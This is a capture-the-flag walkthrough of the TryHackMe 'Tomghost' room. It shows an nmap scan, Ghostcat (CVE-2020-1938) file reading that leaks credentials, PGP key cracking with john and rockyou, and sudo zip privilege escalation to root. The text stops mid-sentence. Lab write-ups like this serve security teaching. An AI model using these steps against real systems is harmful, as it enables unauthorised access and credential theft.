In this post, we will look into the room “Tomghost” from TryHackMe, which can be found on https://tryhackme.com
First step is to enumerate the machine. A simple nmap scan will do it:
nmap -Pn -sV --script vulners <IP> Nmap scan report for 10.10.170.7 Host is up (0.055s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 53/tcp open tcpwrapped 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8080/tcp open http Apache Tomcat 9.0.30 | vulners: | cpe:/a:apache:tomcat:9.0.30: |_ CVE-2020-1938 7.5 https://vulners.com/cve/CVE-2020-1938 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Step 2 – Web Exploitation
From the following Nmap scan, we can see that the box is vulnerable to CVE-2020-1938. Simple research revealed that this version of Apache Tomcat appears to be vulnerable to File Reading/Inclusion. The following exploit can allow us to read sensitive information, such as login credentials.
Download the exploit and run it using
python 48143.py <IP>
You should see a similar output:
Getting resource at ajp13://<IP>/asdf ---------------------------- <?xml version="1.0" encoding="UTF-8"?> <!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd" version="4.0" metadata-complete="true"> <display-name>Welcome to Tomcat</display-name> <description> Welcome to GhostCat [USERNAME:PASSWORD] </description> </web-app>
You should see the credentials at the end of the output.
Step 3 – User.txt
Use the following credentials to log into the machine via ssh.
After that, you can immediately get user.txt by browsing to
/home and visiting another user’s directory.
Step 4 – Horizontal privilege escalation
Go back to the initial user’s home folder and take a look at what we got there. We can see that there are exactly 2 files:
tryhackme.asc. As we can easily guess, those files will reveal us some credentials (most likely for the second user).
A simple google search on PGP cracking led me to this article. This small guide tells us to crack the
.asc file with john the ripper and then use it to open up the PGP.
Let’s first convert the
.asc file into a suitable format by running:
gpg2john tryhackme.asc > hash
Then, what we need to do is simply run a rockyou-powered cracking process on the
john hash --wordlist=/usr/share/wordlists/rockyou.txt
A password is going to be revealed in a couple of seconds and we can finally use it to open up the
.pgp file. Run the following command and enter the password:
gpg --import tryhackme.asc
You can now easily open the PGP file after importing the key.
gpg --decrypt credential.pgp
Bingo! We got the credentials. Now let’s ssh into the box and enumerate there.
Step 5 – Root
sudo -l reveals that we can run
/usr/bin/zip as sudo. A given configuration is relatively famous and is covered by GTFOBins.
Let’s follow the guide from GTFO and get the root shell!
Done! We now have root access and can finally read the